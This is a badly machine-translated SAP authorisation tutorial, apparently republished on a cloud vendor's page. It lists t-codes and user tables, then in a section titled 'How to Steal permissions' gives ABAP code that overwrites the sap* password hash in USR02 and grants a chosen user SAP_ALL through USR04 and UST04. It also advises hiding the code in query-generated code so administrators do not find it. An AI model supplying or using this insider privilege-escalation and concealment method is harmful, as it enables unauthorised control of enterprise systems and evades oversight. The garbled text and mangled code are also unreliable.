SAP User Rights Anatomy detailed

Source: Internet
Author: User

"IT168 informatization"

Generally, basis will use PFCG to do privilege management, and when you save it will produce a system profile name,
Remember SU01 when the user has profile and role two fields? What about their relationship?

First understand a few concepts.


Let's just say we start with activity, what does activity mean, you check it out.
The dictionary also knows, is the stipulation can do what action, for example cannot smoke can only drink, cannot more than 22,
No, this is what my wife said, SAP is not like this, is only inserts, Update,display or something.
These things were written in the Tobj table by the Germans.
Activity can also be divided into activity group.

2.activity Category &authorization Group

Role Vs Profile

If you look at the T020, you'll know what K,d, A, M or something.

What is profile? It can actually be understood as all authorization data (there are a lot of authorization group--{you can use OBA7 to fill out,
Permission too thin is not a good thing ^_^} and activity consist of a set of names, usually a custom role-producing
Give birth to a PROFILE,SAP authority control is based on authorization data (objects) in profile.

What role is it? Role is just a name, and then give profile to it, such as you SU01 build a
User, I don't have any role, but add like Sap_all profile
It can do anything.
SAP itself has many default role & profiles.

3. The most commonly used PFCG

->authorizations->change Authorization data->
After entering, select selection criteria to see all authorization object
Manually can manually add authorization object, such as you use a T-code permission error, ABAP use SU53 check
Know which authorization objec is missing, and then hand it in.
You choose to authorization levels, you can subdivide the permissions by the account type.
Some even go directly to a table field. And you can even? An object allocates buffer buffer.

So how does SAP control the rights, the Butcher will use a knife small slaughter.

4. Several t-code on the mandate.

A Role (roles) related t-code:

PFAC Standard
Pfac_del Delete
Pfac_dis Display
Pfac_ins New
PFCG Create
ROLE_CMP comparison
SUPC Bulk Build Character profile
Swuj Test
SU03 Detection authorzation Data
SU25, SU26 Check updated profile

(ii) Establishment of user-related t-code:

SU50, Su51, SU52
SU10 Batch
SU12 Batch
Sucomp: Maintain user company address
SU2 change user parameters
Suim User Information System
User Group
SUGR: Maintenance
Sugrd_nav: or the maintenance
Sugr_nav: or the display

(iii) About Profile&authoraztion Data

The code is as follows Copy Code

SU02: Create profile directly without role
SU20: Subdivision Authorization Fields

SU21 (SU03):* * * * * Maintenance Authorization Objects (TOBJ,USR12).
For vouchers you can subdivide to:
F_bkpf_bed:accounting Document:account Authorization for Customers
F_bkpf_bek:accounting Document:account Authorization for vendors
F_bkpf_bes:accounting document:account Authorization for g/l Accounts
F_bkpf_bla:accounting document:authorization for Document Types
F_bkpf_buk:accounting Document:authorization for company codes
F_bkpf_bup:accounting document:authorization for Posting periods
F_bkpf_gsb:accounting document:authorization for Business Areas
F_bkpf_koa:accounting document:authorization for Account Types
F_bkpf_vw:accounting document:change Default Values for Doc.type/psky
And then you go in and you can subdivide, these things are save in the USR12 table. The DB layer is utab.

For specific transaction code subdivision:
su53:*** is that you make a mistake to check without those authoraztion objects.
SU56: Analyze authoraztion data buffers.
SU87: Used to check the history generated by user changes
SU96,SU97,SU98,SU99: What are you doing?
SUPC: Bulk Production role

DB and Logical layers:
Sukri:transaction combinations Critical for security
Tobj:all avaiable authorzation objects. (All here)
USR12: User-level Authoraztion value
USR01: Master Data
USR02: The password is here
USR04: Authorize this
Usr03:user Address Data
Usr05:user Master Parameter ID
Usr06:additional Data per User
Usr07:object/values of authorization check that failed
Usr08:table for user menu entries
Usr09:entries for user menus (work areas)
Usr10:user Master Authorization Profiles
Usr11:user Master texts for Profiles (USR10)
Usr12:user Master Authorization values
Usr13:short Texts for authorizations
Usr14:surchargeable Language versions per User
Usr15:external User Name
Usr16:values for Variables for User authorizations
Usr20:date of last User master reorganization
Usr21:assign User name address key
Usr22:logon Data without kernel access
Usr30:additional Information for User Menu
Usr40:table for illegal passwords
USR41: Current User
Ust04:user profile Here
Ust10c:composite Profiles
Ust10s:single profiles (role corresponding)

How to Steal permissions


The code is as follows Copy Code
User type:
The usual user types are
A.dialog (normal user)

Usually you will have permission to test before using any t-code.

Authority_check: This function is just a small check to see if your user is there, and when it expires.
* * If coding only use this function is enough.
Authority_check_tcode: Check T-code

This z function is really checking autorization objects.

The code is as follows Copy Code
A Uthorization_data_read_selobj:

The sap* password is changed to 123 program, very simple.
We found the user logon form USR02.

The code is as follows Copy Code
(Df52478e6ff90eeb is stored in DB through SAP encryption, password encryption of SAP?)
The zmodsap*.
Data zUSR02 like USR02.
Select Single * to zUSR02 from USR02
where bname = ' sap* '.
Zusr02-bcode = ' Df52478e6ff90eeb '.
Update USR02 from zUSR02.

Now the question is how to make your basis do not find, very simple, the code hidden in query, is that you do a
Query,query is going to generate code, and then you add it, who can think of??? And then you wait for your basis to cry ...

It's too vicious to do it. or secretly engage their own users.
You have to be very clear about the authority structure here.
Permissions are related to three tables.

The code is as follows Copy Code

    c.usrbf2 This table corresponds to the Authorzization objects used. br>     *&---------------------------------------------------------------------*
     *& report:steal SAP All right *
    *& Creation date:2004.04.01 *
     *& Created by:Stone.Fu *
    *& Description: Can steal SAP all permissions *
  & nbsp *& Modified date:2005.11.02
    *& Description: Put this code hide in the in-painter or query code *

    data zUSR04 like USR04. "???????? Work area??
    data zUST04 like USR04.
    data zprofs like Usr04-profs.
    Data ZUSRBF2 like USRBF2 occurs 0 with header line.
    "USRBF2????? Internal Table
    * * Update Authorization table USR04.
    Select Single * to zUSR04 from USR04
    where bname = ' ZABC2 '. SAP All permissions
    move ' C sap_all ' to Zprofs.
    zusr04-nrpro = ' 14 '.
    zusr04-profs = zprofs.
    Update USR04 from zUSR04.

**update User Authorization Masters table UST04.
Select Single * to zUST04 from UST04
where bname = ' ZABC2 '.
Zust04-profile = ' Sap_all '. The SAP all permissions
Update UST04 from zUST04.

*????? Insert
*zust04-mandt = ' 200 '.
*zust04-bname = ' ZABC2 '.
*zust04-profile = ' Sap_all '.
*insert UST04 from ZUST04.

SELECT * from USRBF2 into table ZUSRBF2
where bname = ' sap* '.
Loop at ZUSRBF2.
Zusrbf2-bname = ' ZABC2 '.
Modify ZUSRBF2 INDEX Sy-tabix transporting bname.

Build yourself a ztest user does not give it any permissions and then run report zrightsteal on test machine.

Then Ztest is Sap_all, and then you hide the code in SQP query's code. Abapcode is too easy to find.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.